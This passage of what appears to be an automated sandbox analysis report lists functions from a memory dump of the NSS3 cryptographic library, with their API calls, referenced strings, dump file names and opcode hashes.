Part of subcall function 6C7FEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7FEE85

Part of subcall function 6C7FEE50: realloc.MOZGLUE(43BA18CD,?), ref: 6C7FEEAE
Part of subcall function 6C7FEE50: PORT_Alloc_Util.NSS3(?), ref: 6C7FEEC5
Part of subcall function 6C7FEE50: htonl.WSOCK32(?), ref: 6C7FEEE3
Part of subcall function 6C7FEE50: htonl.WSOCK32(00000000,?), ref: 6C7FEEED
Part of subcall function 6C7FEE50: memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C7FEF01

Strings

hrr ech accept confirmation, xrefs: 6C8166C3, 6C816A9B
ech accept confirmation, xrefs: 6C8166BE

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$FreeUtil$ErrorItem_Zfreehtonl$Alloc_DataImportmemcpyrealloc
String ID: ech accept confirmation$hrr ech accept confirmation
API String ID: 316861715-779126823
Opcode ID: dd0c5d879f126df9ce6fd56797249451a202f54ca6f33343bf618424f99c77f9
Instruction ID: 7ee9ce22c3abb600c78b6af8569f8dc6cd15e03eaace6c011dd00ec68828cca5
Opcode Fuzzy Hash: dd0c5d879f126df9ce6fd56797249451a202f54ca6f33343bf618424f99c77f9
Instruction Fuzzy Hash: AAB1B8B6A083166BF710DB249E49BAB72E8EF4474CF040928FD94D7B41F731E619C692

Function 6C6FCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6FB999), ref: 6C6FCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6FB999), ref: 6C6FD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C6FB999), ref: 6C6FD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C6FB999), ref: 6C84972B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FCFDD, 6C6FD00E, 6C6FD022, 6C6FD033, 6C849780
database corruption, xrefs: 6C6FCFE7, 6C6FD013, 6C6FD028, 6C6FD039, 6C6FD03E, 6C849786
%s at line %d of [%.10s], xrefs: 6C6FCFEC, 6C6FD018, 6C6FD029, 6C6FD03F, 6C84978B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 8ed74df995b9505b982a0549f9d737b15d53fe2b27b24695b1540a075585082a
Instruction ID: 8612ea26ec92815aa88e2bf40e9117e24bbc8ffc65210eaf6d86fca07bc4858f
Opcode Fuzzy Hash: 8ed74df995b9505b982a0549f9d737b15d53fe2b27b24695b1540a075585082a
Instruction Fuzzy Hash: AA616A71A002149BD330CF29C940BA6B7F6EF95318F1885ADE4499FB42D376E947C7A1

Function 6C882680 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_release_memory.NSS3(PR_Select(),PR_Poll()), ref: 6C88269F
calloc.MOZGLUE(00000014,00000008), ref: 6C8826E0
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C8826F4
PR_Sleep.NSS3(?), ref: 6C882710

Part of subcall function 6C88C2A0: PR_IntervalNow.NSS3 ref: 6C88C2BE
Part of subcall function 6C88C2A0: PR_NewCondVar.NSS3 ref: 6C88C2CC
Part of subcall function 6C88C2A0: EnterCriticalSection.KERNEL32(?), ref: 6C88C2E8
Part of subcall function 6C88C2A0: PR_IntervalNow.NSS3 ref: 6C88C2F7
Part of subcall function 6C88C2A0: _PR_MD_UNLOCK.NSS3(?), ref: 6C88C378
Part of subcall function 6C88C2A0: DeleteCriticalSection.KERNEL32(?), ref: 6C88C390
Part of subcall function 6C88C2A0: free.MOZGLUE(?), ref: 6C88C397

Part of subcall function 6C8828A0: realloc.MOZGLUE(?,000000A8), ref: 6C8828EB
Part of subcall function 6C8828A0: memset.VCRUNTIME140(-FFFFFAC0,00000000,000000A0), ref: 6C88290A

PR_SetError.NSS3(FFFFE891,00000000), ref: 6C88287D
free.MOZGLUE(?), ref: 6C88288B

Strings

PR_Poll(), xrefs: 6C882695
PR_Select(), xrefs: 6C88269A

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalErrorIntervalSectionfree$CondDeleteEnterSleepcallocmemsetreallocsqlite3_release_memory
String ID: PR_Poll()$PR_Select()
API String ID: 3069664790-3034026096
Opcode ID: 260c95712683880eb24f0836aa71ecf9c8b101bd6b9041aa6e1ba8d603b165fb
Instruction ID: 6861c5dd8608ae688f8636d709e29eeacd2193abe651ee80c8763e618b2c2dd0
Opcode Fuzzy Hash: 260c95712683880eb24f0836aa71ecf9c8b101bd6b9041aa6e1ba8d603b165fb
Instruction Fuzzy Hash: A661E274A022168FDF20DF59CA487AAB7B1FF44308F148938DD199BB55E739D904CB91

Function 6C7D4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C7D536F,00000022,?,?,00000000,?), ref: 6C7D4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C7D4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C7D4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C7D4FAE
free.MOZGLUE(?), ref: 6C7D4FC8

Strings

oS}l", xrefs: 6C7D4DFB, 6C7D4EF4, 6C7D4EC5
%s=%c%s%c, xrefs: 6C7D4FA9
%s=%s, xrefs: 6C7D4F89

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oS}l"
API String ID: 2709355791-2082417239
Opcode ID: 1708a27c433e4ffd1b9bf3772f7a60c1dfe36fca9905f5aa5e7361a670198eec
Instruction ID: 4c075b2ee2c6c030f809ccb0de39babeef9d102d3f3a05f5ac963ebc35c73851
Opcode Fuzzy Hash: 1708a27c433e4ffd1b9bf3772f7a60c1dfe36fca9905f5aa5e7361a670198eec
Instruction Fuzzy Hash: 3D515971A04146ABEF01CB69C6907FF7BF99F42308F1E8136E894A7A41D325A8059792

Function 6C7FEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FEF6D

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

htonl.WSOCK32(00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FEFE4
htonl.WSOCK32(?,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FEFF1
memcpy.VCRUNTIME140(?,?,6C81A4A1,?,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FF00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C81A4A1,?,00000000,?,00000001), ref: 6C7FF027

Strings

dtls13, xrefs: 6C7FEF33

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: eb107c6c2fcd318995edff95dfa7555f3a6df9f61ad2ab2da428ae857d14265e
Instruction ID: 9df5b4555425a5dcc8939ababdb9b03bcbe838fc916e1e6a3c10734e1f948f38
Opcode Fuzzy Hash: eb107c6c2fcd318995edff95dfa7555f3a6df9f61ad2ab2da428ae857d14265e
Instruction Fuzzy Hash: 58310671A01215AFD710DF28DE80B9AB7E4EF49348F158439E8289B751E731E916CBE1

Function 6C77AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C77AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C899500,6C773F91), ref: 6C77AFD2

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

DER_GetInteger_Util.NSS3(?), ref: 6C77B007

Part of subcall function 6C7C6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C771666,?,6C77B00C,?), ref: 6C7C6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C77B02F
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C77B046
PL_FreeArenaPool.NSS3 ref: 6C77B058
PL_FinishArenaPool.NSS3 ref: 6C77B060

Strings

security, xrefs: 6C77AFB8

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: b004f437ae6a2d62fed60de5a2c0eebe1b1b280373cf6219796c2ad56377a6a8
Instruction ID: 238b97ef3bb303d8200b70d86b543278bf3127edb217e8dd7074b7bf8587aaa5
Opcode Fuzzy Hash: b004f437ae6a2d62fed60de5a2c0eebe1b1b280373cf6219796c2ad56377a6a8
Instruction Fuzzy Hash: 4D313A705043049BDF308F149E4CBAA77A4AF4632CF100A68E8759BBC1E332A609C7A7

Function 6C7BCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C7BCD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C7BCE16
PR_SetError.NSS3(00000000,00000000), ref: 6C7BD079

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 00d869b5061ca9b2ac6766d60c915f68d813d172a10e0d3eb9f0be496ff92662
Instruction ID: ae664c8bb7a760bb95369826bac31f384a73ad3332623e64857179559dfb8aaf
Opcode Fuzzy Hash: 00d869b5061ca9b2ac6766d60c915f68d813d172a10e0d3eb9f0be496ff92662
Instruction Fuzzy Hash: F8C18DB5A002199FDB20CF24CD85BDAB7B4BF48318F1481A8E948A7741E775EE95CF90

Function 6C7BC710 Relevance: 13.8, APIs: 9, Instructions: 271COMMON

Download Yara Rule

APIs

Part of subcall function 6C7BC590: PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C7BC5C7
Part of subcall function 6C7BC590: PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C7BC603

TlsGetValue.KERNEL32 ref: 6C7BC825
EnterCriticalSection.KERNEL32(?), ref: 6C7BC839
PR_Unlock.NSS3(?), ref: 6C7BC88B
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7BC966

Part of subcall function 6C7BCA30: TlsGetValue.KERNEL32 ref: 6C7BCA95
Part of subcall function 6C7BCA30: EnterCriticalSection.KERNEL32(00000000), ref: 6C7BCAA9
Part of subcall function 6C7BCA30: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,00000000,?,6C7BC8CF,?,?,?), ref: 6C7BCAE7
Part of subcall function 6C7BCA30: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7BCB09

PK11_FreeSymKey.NSS3(?), ref: 6C7BC949
PK11_FreeSymKey.NSS3(?), ref: 6C7BC954
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C7BC9A8
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C7BC9B7
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C7BC9F9

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorK11_$CriticalDoesEnterFreeMechanismSectionUnlockValue$Item_UtilZfree
String ID:
API String ID: 1505861056-0
Opcode ID: ba3165fe0a670c4f763b29338ebbfbadde8d495014118c9ff910285f9a9e0e39
Instruction ID: e45de77421d0ea406fb607ca11252fcc29541e0a8b4425c291245db745e01c2e
Opcode Fuzzy Hash: ba3165fe0a670c4f763b29338ebbfbadde8d495014118c9ff910285f9a9e0e39
Instruction Fuzzy Hash: 23A17071E00209AFEB10DFA9DD85A9E7BB5BF48349F148038E809B7741E771E915CB90

Function 6C7906A0 Relevance: 13.7, APIs: 9, Instructions: 225stringCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7906C2
EnterCriticalSection.KERNEL32(?), ref: 6C7906D6
PR_Unlock.NSS3 ref: 6C7906EB

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

free.MOZGLUE(?), ref: 6C7907DE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7907FA

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSectionValue$EnterLeaveUnlockfreestrlen
String ID:
API String ID: 3527478211-0
Opcode ID: 42ed7e461564803c955d5d0fe0de4a78d3002c430ccc09dbfef5bd09f887be6e
Instruction ID: 11661c31f4abde9a806259fbc759d415d7ecde2cb83cc3a1a26bacb0f335453a
Opcode Fuzzy Hash: 42ed7e461564803c955d5d0fe0de4a78d3002c430ccc09dbfef5bd09f887be6e
Instruction Fuzzy Hash: 6081F8B19012049FEB009F64DE49AAA7BB4FF19318F054178DD199BB22E731E954CBD1

Function 6C7E4620 Relevance: 13.7, APIs: 9, Instructions: 221threadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6C7E4963

Part of subcall function 6C783090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C79AE42), ref: 6C7830AA
Part of subcall function 6C783090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7830C7
Part of subcall function 6C783090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7830E5
Part of subcall function 6C783090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C783116
Part of subcall function 6C783090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C78312B
Part of subcall function 6C783090: PK11_DestroyObject.NSS3(?,?), ref: 6C783154
Part of subcall function 6C783090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C78317E

SECOID_FindOID_Util.NSS3(?), ref: 6C7E465E

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6C7E4709
SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6C7E4727
SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6C7E473B
PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6C7E4801
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C8A2DA0,?,?,?,?,?,?,?,?,00000000), ref: 6C7E482E
PR_GetCurrentThread.NSS3 ref: 6C7E48F3
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C7E4923
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C7E4937
SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6C7E494E
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7E4984
VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6C7E21C2,?,?,?), ref: 6C7E499C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7E49B5
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6C7E49C5
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C7E49DC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7E49E9

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_Error$AlgorithmFreeTag_$Destroy$FindHashItem_LookupPublicTable$Alloc_ArenaConstCopyCurrentDataEncodeK11_ObjectThreadVerifyWithmemset
String ID:
API String ID: 1962444627-0
Opcode ID: 8a66ce2ef35e3eca3a4d1569095b93f9793e6c7a7f9fffc12bb71f99dee93427
Instruction ID: b0d3d4257b478c2eb802c27c039115999ee048c69693cc084bf733d29feaa4d1
Opcode Fuzzy Hash: 8a66ce2ef35e3eca3a4d1569095b93f9793e6c7a7f9fffc12bb71f99dee93427
Instruction Fuzzy Hash: 7F71E576E012055BFB108AE6DE84BAE7B65EF0D31CF144039ED15ABB41E731E844DB91

Function 6C772C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(43BA18CD), ref: 6C772C5D

Part of subcall function 6C7D0D30: calloc.MOZGLUE ref: 6C7D0D50
Part of subcall function 6C7D0D30: TlsGetValue.KERNEL32 ref: 6C7D0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C772C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C772CE0

Part of subcall function 6C772E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C772CDA,?,00000000), ref: 6C772E1E
Part of subcall function 6C772E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C772E33
Part of subcall function 6C772E00: TlsGetValue.KERNEL32 ref: 6C772E4E
Part of subcall function 6C772E00: EnterCriticalSection.KERNEL32(?), ref: 6C772E5E
Part of subcall function 6C772E00: PL_HashTableLookup.NSS3(?), ref: 6C772E71
Part of subcall function 6C772E00: PL_HashTableRemove.NSS3(?), ref: 6C772E84
Part of subcall function 6C772E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C772E96
Part of subcall function 6C772E00: PR_Unlock.NSS3 ref: 6C772EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C772D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C772D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C772D3F
free.MOZGLUE(00000000), ref: 6C772D73
CERT_DestroyCertificate.NSS3(?), ref: 6C772DB8
free.MOZGLUE ref: 6C772DC8

Part of subcall function 6C773E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C773EC2
Part of subcall function 6C773E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C773ED6
Part of subcall function 6C773E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C773EEE
Part of subcall function 6C773E60: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C773F02
Part of subcall function 6C773E60: PL_FreeArenaPool.NSS3 ref: 6C773F14
Part of subcall function 6C773E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C773F27

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: c36c021531d7af97ebffe897e6f3a4cc4012e90828de995afd3167026f36e81a
Instruction ID: cdc0e03a429952cc83e0fecc831cab13dc491632f540fd8492627873f48fb8fe
Opcode Fuzzy Hash: c36c021531d7af97ebffe897e6f3a4cc4012e90828de995afd3167026f36e81a
Instruction Fuzzy Hash: 5F51D071A04219DBDF209F29CE4AB6B77E5EF94308F140438EC6583650E731E815CBA2

